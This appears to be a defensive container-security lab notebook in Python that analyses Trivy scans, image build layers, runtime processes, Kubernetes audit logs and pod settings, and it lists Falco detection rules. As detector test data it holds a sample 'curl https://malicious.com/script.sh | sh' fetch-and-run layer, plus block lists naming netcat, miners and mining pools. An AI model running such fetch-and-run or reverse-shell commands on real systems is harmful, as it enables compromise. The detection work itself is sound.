# Lab 46: Container Security Analysis

## Overview

Analyze container security threats including image vulnerabilities, runtime attacks, container escapes, and Kubernetes-specific threats.

**Difficulty**: Intermediate  
**Duration**: 90-120 minutes  
**Prerequisites**: Lab 45 (Cloud Fundamentals), basic Docker/Kubernetes knowledge

## Learning Objectives

By the end of this lab, you will be able to:
1. Analyze container images for vulnerabilities and misconfigurations
2. Detect runtime container attacks and anomalies
3. Investigate container escape attempts
4. Analyze Kubernetes audit logs for security events

**Next:** Lab 47 (Serverless Security)

In [ ]:
#@title Install dependencies (Colab only)
#@markdown Run this cell to install required packages in Colab

%pip install -q pandas numpy scikit-learn

In [ ]:
import json
import re
import pandas as pd
import numpy as np
from datetime import datetime
from typing import Dict, List, Any
from collections import defaultdict

print("Libraries loaded successfully!")

## Part 1: Image Vulnerability Analysis

Analyze container image scan results from tools like Trivy to identify vulnerabilities and calculate risk scores.

In [ ]:
def parse_trivy_results(scan_results: Dict) -> pd.DataFrame:
    """Parse Trivy JSON scan results."""
    vulnerabilities = []
    
    for result in scan_results.get('Results', []):
        target = result.get('Target', 'unknown')
        
        for vuln in result.get('Vulnerabilities', []):
            vulnerabilities.append({
                'target': target,
                'vuln_id': vuln.get('VulnerabilityID'),
                'pkg_name': vuln.get('PkgName'),
                'installed_version': vuln.get('InstalledVersion'),
                'fixed_version': vuln.get('FixedVersion'),
                'severity': vuln.get('Severity'),
                'title': vuln.get('Title'),
                'cvss_score': vuln.get('CVSS', {}).get('nvd', {}).get('V3Score')
            })
    
    return pd.DataFrame(vulnerabilities)


def calculate_image_risk_score(vulnerabilities_df: pd.DataFrame) -> Dict:
    """Calculate risk score based on vulnerabilities."""
    severity_weights = {
        'CRITICAL': 10,
        'HIGH': 7,
        'MEDIUM': 4,
        'LOW': 1,
        'UNKNOWN': 2
    }
    
    if len(vulnerabilities_df) == 0:
        return {'total_vulns': 0, 'risk_score': 0}
    
    # Base score from vulnerability counts
    scores = vulnerabilities_df['severity'].map(severity_weights).fillna(2)
    base_score = scores.sum()
    
    # Factor in fixable vs unfixable
    fixable = vulnerabilities_df['fixed_version'].notna().sum()
    total = len(vulnerabilities_df)
    fixable_ratio = fixable / total if total > 0 else 1.0
    
    # Penalize images with unfixed critical vulns
    critical_unfixed = vulnerabilities_df[
        (vulnerabilities_df['severity'] == 'CRITICAL') &
        (vulnerabilities_df['fixed_version'].isna())
    ]
    
    risk_score = base_score * (2 - fixable_ratio)
    if len(critical_unfixed) > 0:
        risk_score *= 1.5  # 50% penalty for unfixed criticals
    
    return {
        'total_vulns': total,
        'critical': len(vulnerabilities_df[vulnerabilities_df['severity'] == 'CRITICAL']),
        'high': len(vulnerabilities_df[vulnerabilities_df['severity'] == 'HIGH']),
        'medium': len(vulnerabilities_df[vulnerabilities_df['severity'] == 'MEDIUM']),
        'low': len(vulnerabilities_df[vulnerabilities_df['severity'] == 'LOW']),
        'fixable': fixable,
        'unfixable_critical': len(critical_unfixed),
        'risk_score': round(risk_score, 2)
    }

print("Image vulnerability analyzer ready!")

In [ ]:
# Demo: Parse and analyze Trivy scan results
print("IMAGE VULNERABILITY ANALYSIS DEMO")
print("=" * 50)

# Simulated Trivy scan results
sample_scan_results = {
    'Results': [
        {
            'Target': 'nginx:1.19',
            'Vulnerabilities': [
                {
                    'VulnerabilityID': 'CVE-2021-3711',
                    'PkgName': 'openssl',
                    'InstalledVersion': '1.1.1j',
                    'FixedVersion': '1.1.1l',
                    'Severity': 'CRITICAL',
                    'Title': 'SM2 Decryption Buffer Overflow',
                    'CVSS': {'nvd': {'V3Score': 9.8}}
                },
                {
                    'VulnerabilityID': 'CVE-2021-3712',
                    'PkgName': 'openssl',
                    'InstalledVersion': '1.1.1j',
                    'FixedVersion': '1.1.1l',
                    'Severity': 'HIGH',
                    'Title': 'Read buffer overruns',
                    'CVSS': {'nvd': {'V3Score': 7.4}}
                },
                {
                    'VulnerabilityID': 'CVE-2020-8286',
                    'PkgName': 'curl',
                    'InstalledVersion': '7.64.0',
                    'FixedVersion': '7.74.0',
                    'Severity': 'HIGH',
                    'Title': 'Improper Certificate Verification',
                    'CVSS': {'nvd': {'V3Score': 7.5}}
                },
                {
                    'VulnerabilityID': 'CVE-2021-22890',
                    'PkgName': 'curl',
                    'InstalledVersion': '7.64.0',
                    'FixedVersion': None,  # No fix available
                    'Severity': 'CRITICAL',
                    'Title': 'TLS Session Resumption Bypass',
                    'CVSS': {'nvd': {'V3Score': 9.1}}
                },
                {
                    'VulnerabilityID': 'CVE-2021-33560',
                    'PkgName': 'libgcrypt',
                    'InstalledVersion': '1.8.4',
                    'FixedVersion': '1.8.8',
                    'Severity': 'MEDIUM',
                    'Title': 'Side-channel Attack',
                    'CVSS': {'nvd': {'V3Score': 5.5}}
                }
            ]
        }
    ]
}

# Parse results
df_vulns = parse_trivy_results(sample_scan_results)

print("\nVulnerability Summary:")
print(df_vulns[['vuln_id', 'pkg_name', 'severity', 'fixed_version']].to_string())

# Calculate risk score
risk_analysis = calculate_image_risk_score(df_vulns)

print("\n" + "-" * 50)
print("Risk Analysis:")
print(f"  Total Vulnerabilities: {risk_analysis['total_vulns']}")
print(f"  Critical: {risk_analysis['critical']}")
print(f"  High: {risk_analysis['high']}")
print(f"  Medium: {risk_analysis['medium']}")
print(f"  Fixable: {risk_analysis['fixable']}")
print(f"  Unfixable Critical: {risk_analysis['unfixable_critical']}")
print(f"\n  RISK SCORE: {risk_analysis['risk_score']}")

## Part 2: Supply Chain Analysis

Analyze container image build layers for suspicious patterns that might indicate supply chain attacks.

In [ ]:
def analyze_image_layers(image_history: List[Dict]) -> List[Dict]:
    """Analyze image build layers for suspicious patterns."""
    suspicious_patterns = [
        (r'curl.*\|.*sh', 'Piping curl to shell', 'HIGH'),
        (r'wget.*\|.*bash', 'Piping wget to bash', 'HIGH'),
        (r'chmod\s+777', 'World-writable permissions', 'MEDIUM'),
        (r'--allow-root', 'Running as root', 'MEDIUM'),
        (r'PASSWORD|SECRET|KEY', 'Potential hardcoded secrets', 'HIGH'),
        (r'apt-get.*--force-yes', 'Bypassing package verification', 'HIGH'),
        (r'pip install.*--trusted-host', 'Insecure pip install', 'MEDIUM'),
        (r'git clone.*http://', 'Insecure git clone', 'MEDIUM'),
    ]
    
    findings = []
    for idx, layer in enumerate(image_history):
        command = layer.get('CreatedBy', '')
        
        for pattern, description, severity in suspicious_patterns:
            if re.search(pattern, command, re.IGNORECASE):
                findings.append({
                    'layer': idx,
                    'pattern': pattern,
                    'description': description,
                    'severity': severity,
                    'command_preview': command[:100]
                })
    
    return findings

print("Supply chain analyzer ready!")

In [ ]:
# Demo: Analyze image layers
print("SUPPLY CHAIN ANALYSIS DEMO")
print("=" * 50)

# Simulated docker history output
sample_image_history = [
    {'CreatedBy': '/bin/sh -c apt-get update && apt-get install -y nginx'},
    {'CreatedBy': '/bin/sh -c curl https://malicious.com/script.sh | sh'},
    {'CreatedBy': '/bin/sh -c chmod 777 /var/www/html'},
    {'CreatedBy': '/bin/sh -c echo "PASSWORD=admin123" >> /etc/env'},
    {'CreatedBy': '/bin/sh -c pip install flask'},
    {'CreatedBy': '/bin/sh -c git clone http://insecure-repo.com/app.git'},
]

# Analyze layers
findings = analyze_image_layers(sample_image_history)

print("\nSupply Chain Findings:")
print("-" * 50)

if findings:
    for finding in findings:
        print(f"\nLayer {finding['layer']} - {finding['severity']}")
        print(f"  Issue: {finding['description']}")
        print(f"  Command: {finding['command_preview']}")
else:
    print("No suspicious patterns found.")

print(f"\nTotal Findings: {len(findings)}")
print(f"High Severity: {len([f for f in findings if f['severity'] == 'HIGH'])}")

## Part 3: Runtime Attack Detection

Detect malicious activity in running containers including suspicious processes, cryptomining, and container escape attempts.

In [ ]:
# Suspicious process patterns for containers
SUSPICIOUS_CONTAINER_PROCESSES = [
    'nc', 'ncat', 'netcat',          # Netcat variants
    'nmap', 'masscan',               # Network scanning
    'tcpdump', 'wireshark',          # Packet capture
    'curl', 'wget',                  # Download tools (in runtime)
    'python', 'perl', 'ruby',        # Scripting (if not expected)
    'gcc', 'make', 'ld',             # Compilation tools
    'mount', 'umount',               # Mount operations
    'insmod', 'modprobe',            # Kernel module loading
]

# Mining process patterns
MINING_PROCESSES = [
    'xmrig', 'ccminer', 'cgminer', 'bfgminer',
    'minerd', 'cpuminer', 'ethminer', 'phoenixminer'
]

MINING_POOL_PATTERNS = [
    r'stratum\+tcp://',
    r'mining\.pool',
    r'minexmr\.com',
    r'nanopool\.org',
    r'2miners\.com',
]


def flag_suspicious_processes(processes_df: pd.DataFrame) -> pd.DataFrame:
    """Flag known suspicious processes."""
    return processes_df[
        processes_df['process_name'].str.lower().isin(
            [p.lower() for p in SUSPICIOUS_CONTAINER_PROCESSES]
        )
    ]


def detect_cryptomining(network_df: pd.DataFrame, process_df: pd.DataFrame) -> Dict:
    """Detect cryptomining activity in containers."""
    results = {
        'mining_processes': [],
        'mining_connections': [],
        'high_cpu_containers': []
    }
    
    # Check for mining process names
    for proc_name in MINING_PROCESSES:
        matches = process_df[process_df['process_name'].str.lower() == proc_name.lower()]
        if len(matches) > 0:
            results['mining_processes'].extend(matches.to_dict('records'))
    
    # Check for mining pool connections
    for pattern in MINING_POOL_PATTERNS:
        matches = network_df[
            network_df['destination'].str.contains(pattern, case=False, na=False)
        ]
        if len(matches) > 0:
            results['mining_connections'].extend(matches.to_dict('records'))
    
    # Check for high CPU usage
    if 'cpu_percent' in process_df.columns:
        high_cpu = process_df[process_df['cpu_percent'] > 80]
        results['high_cpu_containers'] = high_cpu['container_id'].unique().tolist()
    
    return results


def detect_container_escape_attempts(events_df: pd.DataFrame) -> Dict:
    """Detect potential container escape attempts."""
    escape_checks = {
        'privileged_container': lambda df: df.get('privileged', pd.Series(dtype=bool)) == True,
        'docker_socket_mount': lambda df: df.get('mounts', pd.Series(dtype=str)).str.contains('/var/run/docker.sock', na=False),
        'host_path_mount': lambda df: df.get('mounts', pd.Series(dtype=str)).str.contains('hostPath', na=False),
        'sys_admin_cap': lambda df: df.get('capabilities', pd.Series(dtype=str)).str.contains('SYS_ADMIN', na=False),
        'host_pid': lambda df: df.get('host_pid', pd.Series(dtype=bool)) == True,
        'host_network': lambda df: df.get('host_network', pd.Series(dtype=bool)) == True,
    }
    
    findings = {}
    escape_score = 0
    
    for check_name, check_func in escape_checks.items():
        try:
            result = check_func(events_df)
            count = result.sum() if hasattr(result, 'sum') else 0
            findings[check_name] = count
            if count > 0:
                escape_score += 1
        except Exception:
            findings[check_name] = 0
    
    return {
        'findings': findings,
        'escape_score': escape_score,
        'risk_level': 'CRITICAL' if escape_score >= 3 else 'HIGH' if escape_score >= 2 else 'MEDIUM' if escape_score >= 1 else 'LOW'
    }

print("Runtime attack detector ready!")

In [ ]:
# Demo: Runtime attack detection
print("RUNTIME ATTACK DETECTION DEMO")
print("=" * 50)

# Simulated process data
process_data = pd.DataFrame([
    {'container_id': 'c1', 'process_name': 'nginx', 'cpu_percent': 5},
    {'container_id': 'c1', 'process_name': 'python', 'cpu_percent': 10},
    {'container_id': 'c2', 'process_name': 'nc', 'cpu_percent': 2},  # Suspicious
    {'container_id': 'c3', 'process_name': 'xmrig', 'cpu_percent': 95},  # Mining!
    {'container_id': 'c4', 'process_name': 'nmap', 'cpu_percent': 30},  # Suspicious
    {'container_id': 'c5', 'process_name': 'app', 'cpu_percent': 15},
])

# Simulated network data
network_data = pd.DataFrame([
    {'container_id': 'c1', 'destination': 'api.example.com:443'},
    {'container_id': 'c3', 'destination': 'stratum+tcp://pool.minexmr.com:4444'},  # Mining pool!
    {'container_id': 'c2', 'destination': '192.168.1.100:4444'},  # Reverse shell?
])

# Detect suspicious processes
print("\n1. Suspicious Processes:")
suspicious = flag_suspicious_processes(process_data)
if len(suspicious) > 0:
    print(suspicious[['container_id', 'process_name']].to_string())
else:
    print("  No suspicious processes found.")

# Detect cryptomining
print("\n2. Cryptomining Detection:")
mining_results = detect_cryptomining(network_data, process_data)
print(f"  Mining Processes Found: {len(mining_results['mining_processes'])}")
print(f"  Mining Pool Connections: {len(mining_results['mining_connections'])}")
print(f"  High CPU Containers: {mining_results['high_cpu_containers']}")

# Container escape detection
print("\n3. Container Escape Detection:")
escape_events = pd.DataFrame([
    {'container_id': 'c1', 'privileged': True, 'mounts': '/var/run/docker.sock', 'capabilities': 'SYS_ADMIN', 'host_pid': False, 'host_network': False},
    {'container_id': 'c2', 'privileged': False, 'mounts': '/data', 'capabilities': '', 'host_pid': False, 'host_network': False},
])

escape_results = detect_container_escape_attempts(escape_events)
print(f"  Risk Level: {escape_results['risk_level']}")
print(f"  Escape Score: {escape_results['escape_score']}")
print(f"  Findings:")
for check, count in escape_results['findings'].items():
    if count > 0:
        print(f"    - {check}: {count}")

## Part 4: Kubernetes Audit Log Analysis

Analyze Kubernetes audit logs for RBAC violations, privilege escalation, and suspicious API activity.

In [ ]:
def parse_k8s_audit_logs(audit_events: List[Dict]) -> pd.DataFrame:
    """Parse Kubernetes audit log events."""
    parsed_events = []
    
    for event in audit_events:
        parsed_events.append({
            'timestamp': event.get('requestReceivedTimestamp'),
            'verb': event.get('verb'),
            'user': event.get('user', {}).get('username'),
            'groups': event.get('user', {}).get('groups', []),
            'resource': event.get('objectRef', {}).get('resource'),
            'name': event.get('objectRef', {}).get('name'),
            'namespace': event.get('objectRef', {}).get('namespace'),
            'response_code': event.get('responseStatus', {}).get('code'),
            'source_ip': event.get('sourceIPs', [None])[0],
            'user_agent': event.get('userAgent'),
        })
    
    return pd.DataFrame(parsed_events)


def detect_rbac_violations(audit_df: pd.DataFrame) -> Dict:
    """Detect potential RBAC violations and privilege escalation."""
    results = {
        'auth_failures': [],
        'suspicious_users': {},
        'sensitive_access': [],
        'privilege_escalation': []
    }
    
    # Find authorization failures
    auth_failures = audit_df[audit_df['response_code'] == 403]
    results['auth_failures'] = auth_failures.to_dict('records')
    
    # Find users with repeated failures
    if len(auth_failures) > 0:
        repeat_failures = auth_failures.groupby('user').size()
        suspicious = repeat_failures[repeat_failures > 3]
        results['suspicious_users'] = suspicious.to_dict()
    
    # Detect sensitive resource access
    sensitive_resources = ['secrets', 'configmaps', 'serviceaccounts',
                          'clusterroles', 'clusterrolebindings']
    
    sensitive_access = audit_df[
        (audit_df['resource'].isin(sensitive_resources)) &
        (audit_df['verb'].isin(['create', 'update', 'patch', 'delete']))
    ]
    results['sensitive_access'] = sensitive_access.to_dict('records')
    
    # Detect privilege escalation attempts
    priv_esc = audit_df[
        (audit_df['resource'].isin(['clusterroles', 'clusterrolebindings', 'roles', 'rolebindings'])) &
        (audit_df['verb'].isin(['create', 'update', 'patch']))
    ]
    results['privilege_escalation'] = priv_esc.to_dict('records')
    
    return results


def analyze_pod_security(pods: List[Dict]) -> List[Dict]:
    """Analyze pods for security issues."""
    security_issues = []
    
    for pod in pods:
        issues = []
        
        # Check for privileged containers
        if pod.get('privileged'):
            issues.append({
                'severity': 'CRITICAL',
                'issue': 'Privileged container',
                'risk': 'Full host access'
            })
        
        # Check for host namespaces
        if pod.get('host_network'):
            issues.append({
                'severity': 'HIGH',
                'issue': 'Host network enabled',
                'risk': 'Network sniffing, bypass network policies'
            })
        
        if pod.get('host_pid'):
            issues.append({
                'severity': 'HIGH',
                'issue': 'Host PID namespace',
                'risk': 'Process visibility and manipulation'
            })
        
        # Check for dangerous capabilities
        dangerous_caps = ['SYS_ADMIN', 'NET_ADMIN', 'SYS_PTRACE', 'NET_RAW']
        for cap in dangerous_caps:
            if cap in pod.get('capabilities', []):
                issues.append({
                    'severity': 'HIGH',
                    'issue': f'Dangerous capability: {cap}',
                    'risk': f'Capability abuse'
                })
        
        # Check for running as root
        if pod.get('run_as_root', True):
            issues.append({
                'severity': 'MEDIUM',
                'issue': 'Running as root',
                'risk': 'Increased attack surface'
            })
        
        if issues:
            security_issues.append({
                'pod_name': pod.get('name'),
                'namespace': pod.get('namespace'),
                'issues': issues,
                'total_issues': len(issues),
                'max_severity': max(i['severity'] for i in issues) if issues else 'LOW'
            })
    
    return security_issues

print("Kubernetes audit analyzer ready!")

In [ ]:
# Demo: Kubernetes audit log analysis
print("KUBERNETES AUDIT LOG ANALYSIS DEMO")
print("=" * 50)

# Simulated audit events
sample_audit_events = [
    {
        'requestReceivedTimestamp': '2024-01-15T10:00:00Z',
        'verb': 'get',
        'user': {'username': 'admin', 'groups': ['system:masters']},
        'objectRef': {'resource': 'pods', 'name': 'web-app', 'namespace': 'default'},
        'responseStatus': {'code': 200},
        'sourceIPs': ['10.0.0.1'],
        'userAgent': 'kubectl/v1.25.0'
    },
    {
        'requestReceivedTimestamp': '2024-01-15T10:01:00Z',
        'verb': 'get',
        'user': {'username': 'attacker', 'groups': ['users']},
        'objectRef': {'resource': 'secrets', 'name': 'db-credentials', 'namespace': 'default'},
        'responseStatus': {'code': 403},
        'sourceIPs': ['192.168.1.100'],
        'userAgent': 'kubectl/v1.25.0'
    },
    {
        'requestReceivedTimestamp': '2024-01-15T10:02:00Z',
        'verb': 'create',
        'user': {'username': 'developer', 'groups': ['developers']},
        'objectRef': {'resource': 'clusterrolebindings', 'name': 'cluster-admin-binding', 'namespace': ''},
        'responseStatus': {'code': 201},
        'sourceIPs': ['10.0.0.50'],
        'userAgent': 'kubectl/v1.25.0'
    },
    {
        'requestReceivedTimestamp': '2024-01-15T10:03:00Z',
        'verb': 'delete',
        'user': {'username': 'attacker', 'groups': ['users']},
        'objectRef': {'resource': 'configmaps', 'name': 'app-config', 'namespace': 'production'},
        'responseStatus': {'code': 403},
        'sourceIPs': ['192.168.1.100'],
        'userAgent': 'kubectl/v1.25.0'
    },
]

# Parse audit logs
audit_df = parse_k8s_audit_logs(sample_audit_events)

print("\nParsed Audit Events:")
print(audit_df[['timestamp', 'verb', 'user', 'resource', 'response_code']].to_string())

# Detect RBAC violations
print("\n" + "-" * 50)
print("RBAC Violation Analysis:")
rbac_results = detect_rbac_violations(audit_df)

print(f"\n  Authorization Failures: {len(rbac_results['auth_failures'])}")
print(f"  Suspicious Users: {rbac_results['suspicious_users']}")
print(f"  Sensitive Resource Access: {len(rbac_results['sensitive_access'])}")
print(f"  Privilege Escalation Attempts: {len(rbac_results['privilege_escalation'])}")

if rbac_results['privilege_escalation']:
    print("\n  Privilege Escalation Details:")
    for event in rbac_results['privilege_escalation']:
        print(f"    - User '{event['user']}' {event['verb']} {event['resource']}/{event['name']}")

In [ ]:
# Demo: Pod security analysis
print("POD SECURITY ANALYSIS DEMO")
print("=" * 50)

# Simulated pod configurations
sample_pods = [
    {
        'name': 'web-app',
        'namespace': 'default',
        'privileged': False,
        'host_network': False,
        'host_pid': False,
        'capabilities': [],
        'run_as_root': False
    },
    {
        'name': 'privileged-app',
        'namespace': 'default',
        'privileged': True,
        'host_network': True,
        'host_pid': False,
        'capabilities': ['SYS_ADMIN', 'NET_ADMIN'],
        'run_as_root': True
    },
    {
        'name': 'debug-pod',
        'namespace': 'kube-system',
        'privileged': False,
        'host_network': False,
        'host_pid': True,
        'capabilities': ['SYS_PTRACE'],
        'run_as_root': True
    },
]

# Analyze pod security
security_issues = analyze_pod_security(sample_pods)

print("\nPod Security Findings:")
print("-" * 50)

for pod_result in security_issues:
    print(f"\nPod: {pod_result['namespace']}/{pod_result['pod_name']}")
    print(f"  Max Severity: {pod_result['max_severity']}")
    print(f"  Total Issues: {pod_result['total_issues']}")
    print(f"  Issues:")
    for issue in pod_result['issues']:
        print(f"    - [{issue['severity']}] {issue['issue']}: {issue['risk']}")

# Summary
print("\n" + "=" * 50)
print("SUMMARY")
critical_pods = len([p for p in security_issues if p['max_severity'] == 'CRITICAL'])
high_pods = len([p for p in security_issues if p['max_severity'] == 'HIGH'])
print(f"Total Pods Analyzed: {len(sample_pods)}")
print(f"Pods with Issues: {len(security_issues)}")
print(f"Critical Severity: {critical_pods}")
print(f"High Severity: {high_pods}")

## Part 5: Falco Rules for Container Security

Example Falco rules for detecting container security threats.

In [ ]:
# Falco rule examples (YAML format shown as string for reference)
FALCO_RULES = '''
# Custom Falco rules for container security

- rule: Container Escape via Docker Socket
  desc: Detect container accessing Docker socket
  condition: >
    container and
    (fd.name startswith /var/run/docker.sock or
     fd.name startswith /run/docker.sock)
  output: >
    Container accessing Docker socket
    (user=%user.name container=%container.name
     image=%container.image.repository command=%proc.cmdline)
  priority: CRITICAL
  tags: [container, escape]

- rule: Reverse Shell in Container
  desc: Detect reverse shell execution in container
  condition: >
    container and
    spawned_process and
    ((proc.name in (nc, ncat, netcat) and
      proc.args contains "-e") or
     (proc.name = bash and
      fd.type = ipv4 and
      fd.l4proto = tcp))
  output: >
    Reverse shell detected in container
    (user=%user.name container=%container.name command=%proc.cmdline
     connection=%fd.name)
  priority: CRITICAL
  tags: [container, network, shell]

- rule: Cryptocurrency Miner Started
  desc: Detect cryptocurrency mining software
  condition: >
    container and
    spawned_process and
    (proc.name in (xmrig, ccminer, minerd, cpuminer) or
     proc.args contains "stratum+tcp")
  output: >
    Cryptominer detected (container=%container.name
     image=%container.image.repository command=%proc.cmdline)
  priority: HIGH
  tags: [container, cryptomining]

- rule: Sensitive File Access in Container
  desc: Detect access to sensitive files
  condition: >
    container and
    open_read and
    (fd.name startswith /etc/shadow or
     fd.name startswith /etc/passwd or
     fd.name startswith /proc/1/ or
     fd.name contains /.ssh/)
  output: >
    Sensitive file access in container
    (file=%fd.name container=%container.name command=%proc.cmdline)
  priority: WARNING
  tags: [container, filesystem]
'''

print("FALCO RULES FOR CONTAINER SECURITY")
print("=" * 50)
print(FALCO_RULES)

## Key Takeaways

1. **Image Scanning** - Regularly scan images for vulnerabilities using tools like Trivy
2. **Supply Chain Security** - Analyze build layers for suspicious patterns
3. **Runtime Detection** - Monitor for cryptomining, reverse shells, and escape attempts
4. **Kubernetes Audit Logs** - Track RBAC violations and privilege escalation
5. **Pod Security** - Enforce security contexts and avoid privileged containers

## Container Security Checklist

| Area | Check |
|------|-------|
| Images | Scan for CVEs, use minimal base images |
| Runtime | No privileged containers, drop capabilities |
| Network | Network policies, no host network |
| Storage | No host mounts, read-only root filesystem |
| RBAC | Least privilege, audit sensitive access |
| Monitoring | Falco, audit logs, runtime security |

## Next Steps

- **Lab 47**: Serverless Security - Secure Lambda and cloud functions
- **Lab 48**: Cloud IR Automation - Automated incident response
- **Lab 49**: LLM Red Teaming - Advanced security testing